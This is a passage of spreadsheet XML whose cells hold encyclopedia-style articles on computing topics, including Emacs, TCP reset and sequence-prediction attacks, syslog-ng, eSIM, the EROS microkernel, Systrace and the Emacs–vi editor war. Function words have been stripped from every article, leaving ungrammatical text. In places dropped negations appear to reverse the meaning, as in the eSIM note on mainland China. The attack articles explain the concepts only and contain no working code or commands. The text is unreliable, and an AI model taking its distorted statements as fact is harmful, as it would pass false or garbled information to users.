dired, file manager dissociated press, racter-like text generator doctor, implementation eliza dunnet, text adventure emacs wowser (eww), browser. emacs speaks statistics (ess) modes editing statistical languages like erc, client eshell, command line shell written emacs lisp. this allows closer integration emacs environment standard shells bash powershell, also available within emacs. example, eshell, elisp functions available shell commands output unix commands redirected emacs buffer. exwm, window manager allowing apps emacs window. gnus, full-featured news client (newsreader) email client early evidence zawinski's magit, working version control system multilingual enhancement emacs (mule) allows editing text multiple languages manner somewhat analogous unicode org-mode keeping notes, maintaining various types lists, planning measuring projects, composing documents many formats (such pdf, html, opendocument formats). there static site generators using mode, well extension, babel, allowing used literate programming. planner, personal information manager rcirc, client superior lisp interaction mode emacs (slime) extends emacs development environment common lisp. with slime (written emacs lisp) emacs editor communicates common lisp system (using swank backend) special communication protocol provides tools read–eval–print loop, data inspector debugger. texinfo (info), online help-browser zone, display hack mode incorporating various text effects. performance emacs often noticeably slower rival text editors systems first implemented, loading interpreting lisp-based code incurs performance overhead. modern computers powerful enough emacs without slowdowns, versions prior 19.29 (released 1995) edit files larger file size limit raised successive versions, versions emacs 23.2 edit files size. emacs compiled 64-bit machine handle much larger buffers.while primarily written emacs lisp, emacs make libraries improve performance. example, parsing json, emacs libxml2 libjansson, respectively, instead slower built-in emacs lisp libraries. packages installed user load dynamic modules.since version 28.1, emacs natively compile emacs lisp files libgccjit, opposed byte compiling them. platforms emacs most-ported non-trivial computer programs runs wide variety operating systems, including dos, windows openvms. support "obsolete platforms removed emacs 23.1", commercial unix variants. available unix-like operating systems, linux, various bsds, solaris, aix, hp-ux macos, often included system installation packages. native ports emacs exist android nokia's maemo.gnu emacs runs text terminals graphical user interface (gui) environments. unix-like operating systems, emacs window system produce either directly using athena widgets using "widget toolkit" motif, lesstif, gtk+. emacs also graphics systems native macos windows provide menubars, toolbars, scrollbars context menus conforming closely platform's look feel. forks xemacs lucid emacs, based early version emacs developed beginning 1991 jamie zawinski others lucid inc. best-known forks free software development occurred codebases emacs versions diverged separate development teams ceased efforts merge back single program. after lucid filed bankruptcy, lucid emacs renamed xemacs remains second popular variety emacs, emacs. xemacs development slowed, recent stable version 21.4.22 released january 2009, emacs implemented many formerly xemacs-only features. this users proclaim xemacs' death. other forks emacs other forks, less known xemacs, include: meadow japanese version microsoft windows sxemacs steve youngs' fork xemacs aquamacs version focuses integrating apple macintosh user interface remacs port emacs rust programming language. release history changes emacs release listed news file distributed emacs. changes brought downgrading previous release listed "antinews" file, often snarky commentary might desirable. references further reading stallman, richard (2002). emacs manual (15th ed.). press. isbn 978-1-882114-85-6. stallman, richard (2002). lisp experiences development emacs". retrieved 2007-02-01. chassel, robert (2004). introduction programming emacs lisp. press. isbn 978-1-882114-56-6. archived original 2013-07-03. glickstein, (april 1997). writing emacs extensions. o'reilly associates. isbn 978-1-56592-261-7. cameron, debra; elliott, james; loy, marc; raymond, eric; rosenblatt, bill (december 2004). learning emacs, edition. o'reilly associates. isbn 978-0-596-00648-8. external links official website unofficial emacs wiki emacs free software directory</t>
  </si>
  <si>
    <t>ESafe</t>
  </si>
  <si>
    <t>esafe protect, previously known eliashim antivirus, line software security products. developed eliashim ltd., based haifa, israel., distributed esafe technologies inc., seattle, usa. program eliashim acquired aladdin knowledge systems december 1998. esafe protect (the consumer desktop version) distributed aladdin knowledge systems later discontinued 2002.in following years, esafe brand evolved gateway-based, fully featured content security product sold aladdin knowledge systems, integrated security appliance.in march 2009, aladdin knowledge systems merged esafe protect safenet inc., esafe evolved become safenet esafe content security product line. references sources safenet website</t>
  </si>
  <si>
    <t>TCP reset attack</t>
  </si>
  <si>
    <t>reset attack, also known "forged resets", "spoofed reset packets" "tcp reset attacks", tamper terminate internet connection sending forged reset packet. this tampering technique used firewall, abused malicious attacker interrupt internet connections. great firewall china iranian internet censors known reset attacks interfere block connections, major method carry internet censorship. background internet essence, system individual computers exchange electronic messages, packets data. this system includes hardware carry messages (such copper fiber optics cables) formalized system formatting messages, called "protocols". basic protocol used internet (internet protocol), usually coupled additional protocols (transmission control protocol) (user datagram protocol). tcp/ip protocol used email browsing. each protocol block information, called header, included near front packet. headers contain information computer sent packet, computer receive packet size, etc. used two-way virtual connection required computers. (udp hand connectionless protocol.) software machines communicate (for example workstation browser server) exchanging stream packets. using connection gives computers easy exchange data items single packet, video clips, email attachments, music files. although pages small enough single packet, sent connections convenience. resets stream packets connection, packet contains header. each headers contains known "reset" (rst) flag. packets effect; however, indicates receiving computer computer immediately stop using connection; send packets using connection's identifying numbers, called ports, discard packets receives headers indicating belong connection. reset basically kills connection instantly. when used designed, useful tool. common application scenario computer (computer crashes connection progress. computer (computer continue send packets since know computer crashed. when computer reboots, receive packets pre-crash connection. computer context packets knowing them, might send reset computer this reset lets computer know connection longer working. user computer another connection take action. forging resets scenario above, reset sent computer connection endpoints. possible computer monitor packets connection send "forged" packet containing reset endpoints. headers forged packet must indicate, falsely, came endpoint, forger. this information includes endpoint addresses port numbers. every field headers must convincing forged value fake reset trick endpoint closing connection. properly formatted forged resets effective disrupt connection forger monitor. legitimate reset injection obvious application forged reset maliciously disrupt connections without consent parties endpoints. however, network security systems using forged resets designed well. prototype "buster" software package demonstrated 1995 would send forged resets connection used port numbers short list. linux volunteers proposed something similar linux firewalls 2000, open source snort used resets disrupt suspicious connections early 2003. comcast controversy late 2007, comcast began using forged resets cripple peer-to-peer certain groupware applications customers' computers. this started controversy, followed creation network neutrality squad (nnsquad) lauren weinstein, vint cerf, david farber, craig newmark well-known founders champions openness internet. 2008, nnsquad released nnsquad network measurement agent, windows software program written john bartas, could detect comcast's forged resets distinguish real endpoint-generated resets. technology detect resets developed earlier open-source "buster" software used forged resets block malware pages. january 2008, announced would investigate comcast's forged resets, and, august 2008, ordered comcast terminate practice. prevention encrypting connections using vpn, attacker reset attack encrypted connections causing collateral damage. also hijacking references external links snort official website report comcast resets icmp attacks tcp. similar attacks using icmp improving tcp's robustness blind in-window attacks</t>
  </si>
  <si>
    <t>Syslog-ng</t>
  </si>
  <si>
    <t>syslog-ng free open-source implementation syslog protocol unix unix-like systems. extends original syslogd model content-based filtering, rich filtering capabilities, flexible configuration options adds important features syslog, like using transport. today, syslog-ng developed balabit security ltd. three editions common codebase. first called syslog-ng open source edition (ose) license lgpl. second called premium edition (pe) additional plugins (modules) proprietary license. third called storebox (ssb), comes appliance web-based well additional features including ultra-fast-text search, unified search, content-based alerting premier tier support.in january 2018, syslog-ng, part balabit, acquired identity, global vendor identity access management solutions quest software umbrella. syslog-ng team remains independent business within identity organization continues develop open source commercial solutions syslog-ng brand. protocol syslog-ng uses standard syslog protocol, specified 3164. text 3164 informational description standard, incompatible extensions emerged. since version syslog-ng also supports syslog protocol specified 5424. syslog-ng interoperates variety devices, format relayed messages customized. extensions original syslog-ng protocol include: 8601 timestamps millisecond granularity time zone information addition name relays additional host fields, make possible track path given message reliable transport using encryption (since 3.0.1 history syslog-ng project began 1998, balázs scheidler, primary author syslog-ng, ported existing nsyslogd code linux. 1.0.x branch syslog-ng still based nsyslogd sources available syslog-ng source archive. right release syslog-ng 1.0.x, reimplementation code base started address shortcomings nsyslogd address licensing concerns darren reed, original nsyslogd author. this reimplementation named stable october 1999 release version 1.2.0. this time around, syslog-ng depended code originally developed niels möller. three major releases (1.2, 1.6) using code base, last release 1.6.x branch february 2007. period years, syslog-ng became popular alternative syslog implementations. volunteer based effort, another rewrite started back 2001, dropping code using widely available glib library. this rewrite codebase took time, first stable release 2.0.0 happened october 2006. development efforts focused improving 2.0.x branch; support 1.6.x dropped 2007. support dropped 2009, still used linux distributions. balabit, company behind syslog-ng, started parallel, commercial fork syslog-ng, called syslog-ng premium edition. portions commercial income used sponsor development free version. syslog-ng version released fourth quarter 2008. starting version developments efforts parallel premium open source editions. efforts focused quality, transport reliability, performance encrypted storage. open source edition efforts focused improving flexibility core infrastructure allow different, non-syslog message sources. both forks produced releases (3.1 3.2) 2010. features syslog-ng provides number features addition transporting syslog messages storing plain text files: ability format messages using unix shell-like variable expansion (can break cross-platform format compatibility) shell-like variable expansion naming files, covering multiple destination files single statement ability send messages local applications support message flow-control network transport logging directly database (since syslog-ng 2.1) rewrite portions syslog message substitute primitives (since syslog-ng 3.0) classify incoming messages time extract structured information unstructured syslog message (since syslog-ng 3.0) generic name–value support: message name–value pairs, used store extra information (since syslog-ng 3.0) ability process structured message formats transmitted syslog, like extract columns formatted lines (since syslog-ng 3.0) ability correlate multiple incoming messages form complex, correlated event (since syslog-ng 3.2); distributions syslog-ng available number different linux unix distributions. some install system default, provide package replaces previous standard syslogd. several linux distributions used syslog-ng replaced rsyslog. opensuse used default prior opensuse 11.2, still available sles used prior suse linux enterprise server debian gnu/linux used syslogd klogd prior 5.0; post-5.0 ("lenny"), rsyslog used gentoo linux fedora used prior fedora arch linux used default prior adoption systemd 2012 hewlett-packard's hp-ux freebsd port cygwin port available microsoft windows portability syslog-ng highly portable many unix systems, alike. list currently known work unix versions found below: linux i386, arm, powerpc, sparc x86-64 cpus freebsd i386 x86-64 cpus power microprocessors hp-ux 11iv1, 11iv2 11iv3 pa-risc itanium cpus solaris sparc, x86-64 i386 cpus tru64 5.1b alpha cpusthe list based balabit's current first hand experience, platforms also work, mileage vary. related rfcs working groups 3164 syslog protocol 5424 syslog protocol 5425 transport layer security (tls) transport mapping syslog 5426 transmission syslog messages also nxlog datadog syslog rsyslog journald incorporates syslog-functionality graylog references external links official website official syslog-ng documentation comparison syslog-ng guis lggr.io based syslog michael bauer: linux server security, second edition published 2005 o'reilly: system management monitoring (chapter syslog-ng syslog-ng vlogger meet</t>
  </si>
  <si>
    <t>ESSH Client</t>
  </si>
  <si>
    <t>essh client multi task client supports many different protocols, ssh, sftp, ftp, ftps, scp, rexec. also supports ssl. essh client rich design allows multiple access channels time, internal window design allows connections viewed within main window. also tabbed secure shell window named sessions. essh client supports proxies, socks4 socks5, port forwarding, forwarding, encryption management, password public authentication, pair generation, profile management, host management, different screen emulations secure shell, easy gui. essh client also integrated editor allows securely edit files remote server. allows docking secure shell window editor ease use. this software available north america, europe, australia, zealand japan only. possible download evaluation version, however program needs purchased.</t>
  </si>
  <si>
    <t>ESIM</t>
  </si>
  <si>
    <t>esim (embedded-sim) form programmable card embedded directly device. instead integrated circuit located removable universal integrated circuit card (uicc), typically made pvc, esim consists software installed onto euicc chip permanently attached device. once esim carrier profile installed euicc operates physical sim, complete unique iccid network authentication generated carrier. esim standard first released 2016; since point, esim begun replace physical domains including cellular telephony. esims improve reliability network security, also reducing space requirements, since relatively bulky connector needed, increasing design flexibility. history since 2010, gsma discussing possibility software-based sim.while motorola noted euicc geared industrial devices, apple "disagreed statement forbidding embedded uicc consumer product.". currently gsma maintains different versions standard, consumer devices another devices.a first version standard published march 2016, followed second version november 2016. 2016, samsung gear classic smartwatch first device implement esim.in 2017, mobile world congress, qualcomm introduced technical solution, live demonstration, within snapdragon hardware chip associated related software (secured java applications). apple implemented esim support apple watch series later, addition every ipad released since generation ipad pro. apple also included esim support iphone iphone max, iphone later featuring dual sim. esim support iphone requires 12.1 later. esim iphone offered mainland china. hong kong macao, iphone mini, iphone (2nd generation), iphone feature esim.google unveiled pixel october 2017, added esim support google service. 2018, google released pixel pixel subsequently 2019, pixel pixel esim support carriers google october year, google released pixel pixel esim support. motorola released 2020 version motorola razr, foldable smartphone physical slot since supports esim. plintron implemented esim4things internet things product, based esim support devices available countries.microsoft introduced esim windows operating system 2018 launched first esim-enabled device, surface lte, 2017.samsung shipped galaxy series smartphones esim hardware onboard software support box. feature later enabled version update. however, implementation esim different implementation rest world. version lacks ability specify different default sims different functions e.g., default data default voice. requires esim default data, voice, sms. version also forces reboot time user switches esims non-us models not. design traditional card consists integrated circuit located universal integrated circuit card (uicc), typically made pvc, manually inserted device. contrast, esim virtualized card profile installed onto euicc chip permanently surface mounted mobile device factory. euicc chip used host esim uses electrical interface physical defined iso/iec 7816. once esim carrier profile installed euicc operates physical sim, complete unique iccid network authentication generated carrier. esims improve reliability network security, also reducing space requirements, since relatively bulky connector needed, increasing design flexibility. usage esim typically provisioned remotely; end-users remove operators without need physically swap device. esims programmed permanent esim (eid) factory. this number used provisioning service associate device existing carrier subscription well negotiate secure channel programming. specifications esim global specification gsma enables remote provisioning mobile device. gsma defines esim next generation connected consumer devices. networking solutions using esim technology widely applied various internet things (iot) scenarios, including connected cars (smart rearview mirrors, on-board diagnostics (obd), vehicle wi-fi hotspots), artificial intelligence translators, mifi devices, smart earphones, smart metering, tracking units, dtu, bike-sharing, advertising players, video surveillance devices, etc. common physical form factor euicc chip commonly designated mff2.the european commission selected euicc format in-vehicle emergency call service, known ecall, 2012. models must 2018 instantly connect emergency services case accident.russia similar plan glonass (national satellite positioning system) called era-glonass.singapore seeking public opinions introducing esim standard, compatible devices enter market. isim nusim 2021, deutsche telekom introduced alternative esims smaller devices internet things form integrated sims (isims) fully integrated devices' wireless modem chips. called nusim smaller, cheaper potentially secure esims ease logistics production small devices. references external links esim overview gsma</t>
  </si>
  <si>
    <t>TCP sequence prediction attack</t>
  </si>
  <si>
    <t>sequence prediction attack attempt predict sequence number used identify packets connection, used counterfeit packets.the attacker hopes correctly guess sequence number used sending host. this, able send counterfeit packets receiving host seem originate sending host, even though counterfeit packets fact originate third host controlled attacker. possible occur attacker listen conversation occurring trusted hosts, issue packets using source address. monitoring traffic attack mounted, malicious host figure correct sequence number. after address correct sequence number known, basically race attacker trusted host correct packet sent. common attacker send first launch another attack trusted host, denial-of-service attack. once attacker control connection, able send counterfeit packets without getting response.if attacker cause delivery counterfeit packets sort, able cause various sorts mischief, including injection existing connection data attacker's choosing, premature closure existing connection injection counterfeit packets set. theoretically, information timing differences information lower protocol layers could allow receiving host distinguish authentic packets sending host counterfeit packets correct sequence number sent attacker. information available receiving host, attacker also fake information, receiving host gathers uses information correctly, receiving host fairly immune sequence prediction attacks. usually case, sequence number primary means protection traffic types attack. another solution type attack configure router firewall allow packets come external source internal address. although attack, prevent potential attacks reaching targets. also aircrack airsnort backtrack denial-of-service attack nmap packet sniffer snort flood wireshark references external links 1948, defending against sequence number attacks, 1996, obsoleted 6528 steven bellovin. 6528, defending sequence number attacks, february 2012 standard track steven bellovin weakness 4.2bsd unix tcp/ip software</t>
  </si>
  <si>
    <t>Echelon (warez)</t>
  </si>
  <si>
    <t>echelon warez group specializes illegal release distribution copyrighted console games, dreamcast playstation images. they also created demos platforms. between september 2000 april 2002, echelon's dreamcast division released game titles various fixes, tutorials, trainers, loaders.on december 2001, echelon released final fantasy first several hundred playstation titles. 2007, echelon continues release games platform. 2004, echelon named groups targeted part operation fastlink united states department justice.on november 2005, echelon's dragon quest viii file stated echelon indeed kalisto: errr kalisto released november 2001 dragon_warrior_vii_usa_ps1-kalisto, referring previous game series ended dragon warrior kalisto. sega smash pack loader sega smash pack loader front-end loader program released warez group echelon, allowing user load roms sega genesis emulator built sega's sega smash pack volume game dreamcast. provided release emulation software, tools, instructions burning custom roms. legality loader dubious, even owns original title. runs full speed issues (the prominent poor sound), emulator, dubbed "segagen" avoid legal issues, originally embraced dreamcast homebrew community. however, much controversy, dreamcast sites soon stopped hosting loader. loader's small text poor controls, obsidian later released version sega smash pack loader, called "lemec." featured larger, easier-to-read text, quick scrolling files, additional functionality, added stability. obsidian's release include smash pack emulator software legal reasons. such, user requires original echelon release order build disk using lemec loader. also list warez groups references</t>
  </si>
  <si>
    <t>EROS (microkernel)</t>
  </si>
  <si>
    <t>extremely reliable operating system (eros) operating system developed starting 1991 university pennsylvania, johns hopkins university, eros group, llc. features include automatic data process persistence, preliminary real-time support, capability-based security. eros purely research operating system, never deployed real world use. 2005, development stopped favor successor system, capros. concepts overriding goal eros system (and relatives) provide strong support operating system level efficient restructuring critical applications small communicating components. each component communicate others protected interfaces, isolated rest system. protected interface, context, enforced lowest level part operating system, kernel. that part system move information process another. also complete control machine properly constructed) cannot bypassed. eros, kernel-provided mechanism component names invokes services another capability, using inter-process communication (ipc). enforcing capability-protected interfaces, kernel ensures communications process arrive intentionally exported interface. also ensures invocation possible unless invoking component holds valid capability invoked component. protection capability systems achieved restricting propagation capabilities component another, often security policy termed confinement. capability systems naturally promote component-based software structure. this organizational approach similar programming language concept object-oriented programming, occurs larger granularity include concept inheritance. when software restructured way, several benefits emerge: individual components naturally structured event loops. examples systems commonly structured include aircraft flight control systems (see also do-178b software considerations airborne systems equipment certification), telephone switching systems (see 5ess switch). event-driven programming chosen systems mainly simplicity robustness, essential attributes life-critical mission-critical systems. components become smaller individually testable, helps readily isolate identify flaws bugs. isolation component others limits scope damage occur something goes wrong software misbehaves.collectively, benefits lead measurably robust secure systems. plessey system system originally designed telephony switches, capability-based design chosen specifically reasons robustness. contrast many earlier systems, capabilities mechanism naming using resources eros, making sometimes referred pure capability system. contrast, example commercially successful capability system, pure capability system. pure capability architectures supported well-tested mature mathematical security models. these used formally demonstrate capability-based systems made secure implemented correctly. so-called "safety property" shown decidable pure capability systems (see lipton). confinement, fundamental building block isolation, formally verified enforceable pure capability systems, reduced practical implementation eros constructor keykos factory. comparable verification exists primitive protection mechanism. there fundamental result literature showing safety mathematically undecidable general case (see hru, note course provable unbounded restricted cases). greater practical importance, safety shown false primitive protection mechanisms shipping current commodity operating systems. safety necessary precondition successful enforcement security policy. practical terms, result means possible principle secure current commodity systems, potentially possible secure capability-based systems provided implemented sufficient care. neither eros keykos ever successfully penetrated, isolation mechanisms never successfully defeated inside attacker, known whether implementations careful enough. goal coyotos project demonstrate component isolation security definitively achieved applying software verification techniques. l4.sec system, successor microkernel family, capability-based system, significantly influenced results eros project. influence mutual, since eros work high-performance invocation motivated strongly jochen liedtke's successes microkernel family. history primary developer eros jonathan shapiro. also driving force behind coyotos, "evolutionary step" beyond eros operating system.the eros project started 1991 clean-room reconstruction earlier operating system, keykos. keykos developed logic, inc., direct continuation work earlier great operating system (gnosis) system created tymshare, inc. circumstances surrounding logic's demise 1991 made licensing keykos impractical. since keykos popular commodity processors case, decision made reconstruct publicly available documentation. late 1992, become clear processor architecture changed significantly since introduction capability idea, longer obvious component-structured systems practical. microkernel-based systems, similarly favor large numbers processes ipc, facing severe performance challenges, uncertain could successfully resolved. architecture clearly emerging dominant architecture expensive user/supervisor transition latency presented serious challenges process-based isolation. eros project turning research effort, moved university pennsylvania become focus shapiro's dissertation research. 1999, high performance implementation pentium processor demonstrated directly performance competitive microkernel family, known exceptional speed ipc. eros confinement mechanism formally verified, process creating general formal model secure capability systems. 2000, shapiro joined faculty computer science johns hopkins university. hopkins, goal show facilities provided eros kernel construct secure defensible servers application level. funded defense advanced research projects agency force research laboratory, eros used basis trusted window system, high-performance, defensible network stack, beginnings secure browser. also used explore effectiveness lightweight static checking. 2003, challenging security issues discovered intrinsic system architecture based synchronous primitives (notably including eros l4). work eros halted favor coyotos, resolved issues.as 2006, eros successors widely available capability systems commodity hardware. status work eros coyotos original group halted, successor system. capros system building directly eros code base. capros expected released various commercial deployments. also nanokernel references journals lipton, snyder, (july 1977). linear time algorithm deciding subject security". journal acm. (3): 455–464. harrison, michael ruzzo, ullman, jeffrey (august 1976). "protection operating systems". communications acm. (8): 461–471. external links eros home page wayback machine (archived march 2016) coyotos home page wayback machine (archived september 2016) keykos home page wayback machine (archived january 2016) jonathan shapiro's homepage capros</t>
  </si>
  <si>
    <t>Echo (computing)</t>
  </si>
  <si>
    <t>telecommunications, echo local display data, either initially locally sourced sent, finally copy received back remote destination. local echo local sending equipment displays outgoing sent data. remote echo display return copy data received remotely. both used together computed form error detection ensure data received remote destination telecommunication data sent local source (a/k/a echoplex, echo check, loop check). when (two) modems communicate echoplex mode remote modem echoes whatever receives local modem. terminological confusion: echo duplex displayed 'echo' independent 'duplex' any) telecommunications transmission protocol. probably technical ignorance, "half-duplex" "full-duplex" used slang 'local echo' (a/k/a echo 'remote echo', respectively, typically accompany another. strictly incorrect, causes confusion (see duplex). typically 'local echo' accompanies half-duplex transmission, effectively doubles channel bandwidth repeating (echoing) data back destination (remote), reserved-for 'full duplex' (which half bandwidth 'half duplex'). half-duplex 'echo off' echo all.one example 'local echo' used together 'remote echo' (requires full-duplex) error checking pairs data characters chunks (echoplex) ensuring duplicity else extraneous annoyance).similarly, another example, case telnet communications protocol local echo protocol operates full-duplex underlying protocol. connection telnet protocol layered provides full-duplex connection, echo, across data sent either direction simultaneously. whereas network virtual terminal telnet protocol incorporates half-duplex device default) local echo. devices echo locally terminals things perform echoing connection. others include modems, form intervening communications processor, even host system itself. several common computer operating systems, host system performs echoing, appropriate (which for, say, entry user password terminal first connects user prompted in). openvms, example, echoing performed necessary host system. similarly, unix-like systems, local echo performed operating system kernel's terminal device driver, according state device control flag, maintained software alterable applications programs ioctl() system call. actual terminals modems connected systems local echo facilities switched operate echo mode), lest passwords locally echoed password prompts, input appear echoed twice. this true terminal emulator programs, c-kermit, running computer real terminals. controlling local echo terminal emulators most terminal emulator programs ability perform echo locally (which sometimes misname "half-duplex"): c-kermit terminal emulator program, local echo controlled terminal echo command, either terminal echo local (which enables local echoing within terminal emulator program itself) terminal echo remote (where disables local echoing, leaving another device communications channel—be modem remote host system—to perform appropriate). procomm alt+e combination, used time toggle local echo off. terminal program came microsoft windows 3.1, local echo controlled checkbox "terminal preferences" dialogue accessed menu terminal program's window. modems hayes commands control local echo command mode) local echo data mode), commands respectively. note reversal suffixed digits. unlike commands, commands part eia/tia-602 standard. host systems some host systems perform local echo themselves, device drivers forth. unix posix-compatible systems, local echo flag posix terminal interface, settable programmatically tcsetattr() function. echoing performed operating system's terminal device specified posix standard). standard utility program alters flag programmatically stty command, using flag altered shell scripts interactive shell. command turn local echo host system) stty echo command turn stty -echo. openvms systems, operating system's terminal driver normally performs echoing. terminal characteristic controls whether echo characteristic, settable command terminal /echo unsettable terminal /noecho. footnotes references what supports sources used</t>
  </si>
  <si>
    <t>Systrace</t>
  </si>
  <si>
    <t>systrace computer security utility limits application's access system enforcing access policies system calls. this mitigate effects buffer overflows security vulnerabilities. developed niels provos runs various unix-like operating systems. systrace particularly useful running untrusted binary-only applications provides facilities privilege elevation system call basis, helping eliminate need potentially dangerous setuid programs. also includes interactive automatic policy generation features, assist creation base policy application. systrace used integrated openbsd, removed april 2016 favour pledge post openbsd 5.9). available linux although port currently unmaintained. removed netbsd 2007 several unfixed implementation issues. version 1.6f systrace supports 64-bit linux 2.6.1 kernel patch. features systrace supports following features: confines untrusted binary applications: application allowed make system calls specified permitted policy. application attempts execute system call explicitly permitted, alarm gets raised. interactive policy generation graphical user interface: policies generated interactively graphical frontend systrace. frontend shows system calls parameters currently covered policy allows user refine policy works expected. supports different emulations: linux, bsdi, etc.. non-interactive policy enforcement: once policy trained, automatic policy enforcement used deny system calls covered current policy. violations logged syslog. this mode useful protecting system services like server. remote monitoring intrusion detection: systrace supports multiple frontends using frontend makes network, advanced features possible. privilege elevation: using systrace's privilege elevation mode, possible setuid binaries. special policy statement allows selected system calls higher privileges, example, creating socket. vulnerability history systrace vulnerabilities past, including: exploiting concurrency vulnerabilities system call wrappers paper robert watson first usenix workshop offensive technologies (woot07) analyzing system call wrapper traces across several wrapper platforms including systrace google security discovers local privilege escalation systrace local root exploit netbsd vulnerabilities systrace also seccomp apparmor selinux mandatory access control references external links official website</t>
  </si>
  <si>
    <t>Editor war</t>
  </si>
  <si>
    <t>editor rivalry users emacs (now usually vim, recently neovim) text editors. rivalry become lasting part hacker culture free software community. emacs versus debate original "holy wars" conducted usenet groups, many flame wars fought insisting editor choice paragon editing perfection, insulting other, since least 1985. related battles fought operating systems, programming languages, version control systems, even source code indent style. comparison important historical differences emacs presented following table: benefits emacs emacs non-modal interface non-modal nature emacs keybindings makes practical supported os-wide keybindings. ported computer programs. runs text mode graphical user interfaces wide variety operating systems, including unix-like systems (linux, various bsds, solaris, aix, irix, macos etc.), ms-dos, microsoft windows, amigaos, openvms. unix systems, free proprietary, frequently provide emacs bundled operating system. emacs server architecture allows multiple clients attach emacs instance share buffer list, kill ring, undo history state. pervasive online help system keybindings, functions commands documented fly. extensible customizable lisp programming language variant (emacs lisp), features include: ability emulate (using evil, viper vimpulse). powerful extensible file manager (dired), integrated debugger, large development tools. having every command emacs lisp function enables commands dwim what mean) programmatically responding past actions document state. example, switch-or-split-window command could switch another window exists, create needed. this cuts number keystrokes commands user must remember. inside os". emacs lisp enables emacs programmed beyond editing features. even base install contains several dozen applications, including browsers, news readers, several mail agents, four clients, version eliza, variety games. applications available anywhere emacs runs, user interface functionality. starting version emacs includes package manager, making easy install additional applications including alternate browsers, emms (emacs multimedia system), more. also available numerous packages programming, including targeted specific language/library combinations coding styles. benefits edit commands composable modal interface loads faster emacs. being deeply associated unix tradition, runs systems implement standard library, including unix, linux, amigaos, dos, windows, mac, beos, openvms, irix, aix, hp-ux, posix-compliant systems. neovim extensible customizable script apis interpreted languages python, ruby, perl, lua. ubiquitous. essentially unix unix-like systems come variant) built-in. (and vim) specified posix standard. system rescue environments, embedded systems (notably busybox) constrained environments often include emacs. evolution past, many small editors modeled derived flourished. this importance conserving memory comparatively minuscule amount available time. computers become powerful, many clones, particular, grown size code complexity. these variants today, lightweight emacs variants, tend many perceived benefits drawbacks opposing side. example, without extensions requires times disk space required recent versions extensions slower emacs. unix programming, eric raymond called vim's supposed light weight compared emacs shared myth". moreover, large amounts modern computers, emacs lightweight compared large integrated development environments eclipse, tend draw derision emacs users alike. o'reilly said, 1999, o'reilly media's tutorial sells twice many copies emacs (but noted emacs came free manual). many programmers either emacs various offshoots, including linus torvalds uses microemacs. also 1999, creator bill said "written world exist anymore" stated emacs written much capable machines faster displays could "funny commands screen shimmering that, meanwhile, sitting home sort world surplus housing berkeley modem terminal barely cursor bottom line".in addition emacs workalikes, pico free open-source clone nano text editors often third-party advocates editor wars, though extent emacs 2020, emacs claim among longest-lived application programs time, well commonly used text editors linux unix. many operating systems, especially linux derivatives, bundle multiple text editors operating system cater user demand. example, default installation macos contains nano, textedit, vim. frequently, point discussion, someone point standard text editor. humor church emacs, formed emacs project's creator richard stallman, parody religion. while refers "editor beast" (vi-vi-vi 6-6-6 roman numerals), oppose rather, calls proprietary software anathema. ("using free version penance.") church emacs newsgroup, alt.religion.emacs, posts purporting support belief system. stallman referred ignu−cius, saint church emacs.supporters created opposing cult argued hard-line emacs users attempt "ape betters".regarding vi's modal nature common point frustration users) emacs users joke modes "beep repeatedly" "break everything". users enjoy joking emacs's key-sequences induce carpal tunnel syndrome, mentioning many satirical expansions acronym emacs, "escape meta control shift" emacs's reliance modifier keys) "eight megabytes constantly swapping" time great amount memory) "emacs makes computer slow" recursive acronym like stallman uses) "eventually munches computer storage", reference emacs's high system resource requirements. emacs expanded "generally used, except middle-aged computer scientists" referencing ardent fans, declining usage among younger programmers compared graphically-oriented editors atom, bbedit, sublime text, textmate, visual studio code.as poke emacs' creeping featurism, advocates known describe emacs great operating system, lacking decent editor". emacs advocates known respond editor actually good, operating system could improvement (referring emacs' famous lack concurrency, added). game among unix users, either test depth emacs user's understanding editor poke complexity emacs, involved predicting would happen user held modifier (such ctrl alt) typed name. this game humor originated users older teco editor, implementation basis, macros, original emacs. exits (":q", among others), hackers joke proposed method creating pseudorandom character sequence user unfamiliar seated front open editor asking exit program.the google search engine also joined joke searches resulting question "did mean: emacs" prompted page, searches emacs resulting "did mean: vi". also console wars browser wars comparison text editors notes references external links results experiment comparing emacs comparing keystrokes task humor around emacs comparisons results sucks-rules-o-meter emacs comments made church emacs "using free version sin, penance." emacs offers functionality, emacs wiki emacs wikiwikiweb right size editor discussing emacs relatively modern terms</t>
  </si>
  <si>
    <t>Eaton BladeUPS</t>
  </si>
  <si>
    <t>eaton bladeups modular three-phase system consisting individual units paralleled together create redundant ups. feature bladeups cabinet houses electronics batteries; modular systems house separately. high power density form factor bladeups targeted growing power demands servers equipment, especially blade servers. bladeups fall defined category type hybrid line interactive online architecture, eaton calls double conversion demand. during normal operation bladeups operates line interactive allowing energy efficient. when power conditions fluctuate outside preset standards, unit switches online mode (also known double conversion). software upgrades eaton allowed bladeups owners defeat hybrid architecture force unit operate entirely online (double conversion) mode. software bladeups ships eaton’s lansafe software allows monitoring commands. bladeups compatible eaton’s power xpert foreseer software provide additional monitoring functionality. battery runtime four extended battery modules connected bladeups providing additional runtime. awards bladeups named 2007 searchdatacenter.com gold product year. external links eaton corporation bladeups product page notes</t>
  </si>
  <si>
    <t>Dotfuscator</t>
  </si>
  <si>
    <t>dotfuscator tool performing combination code obfuscation, optimization, shrinking, hardening .net, xamarin universal windows platform apps. ordinarily, .net executables easily reverse engineered free tools (such ilspy, dotpeek justdecompile), potentially exposing algorithms intellectual property (trade secrets), licensing security mechanisms. also, code debugger data inspected. dotfuscator make things difficult. dotfuscator developed preemptive solutions. free version .net obfuscator, called dotfuscator community edition, distributed part microsoft's visual studio. however, current version free personal, non-commercial only. references further reading "why obfuscation .net dotfuscator". microsoft visual studio 2017 documentation "obfuscation .net". journal object technology. vol. may–june 2005. 79–83. msdn magazine. miller freeman. 11–12. (subscription required) reversing: secrets reverse engineering. john wiley sons. "review: preemptive obfuscate .net apps". magazine windows developer power tools. o'reilly media. "dotfuscator expands functionality". infoworld. visual basic 2008 dummies. john wiley sons. professional visual studio 2010. john wiley sons. external links https://news.microsoft.com/2004/07/19/preemptive-solutions-dotfuscator-will-ship-with-microsoft-visual-studio-2005/ https://msdn.microsoft.com/library/dd551417.aspx http://www.dirkstrauss.com/visual-studio-2012-tips-part-5-protect-your-code-obfuscate/ http://www.drdobbs.com/windows/enhanced-dotfuscator-ce-for-visual-stud/199901475 https://web.archive.org/web/20110201004909/http://www.clevelandpress.com/dotfuscator2.htm</t>
  </si>
  <si>
    <t>TLBleed</t>
  </si>
  <si>
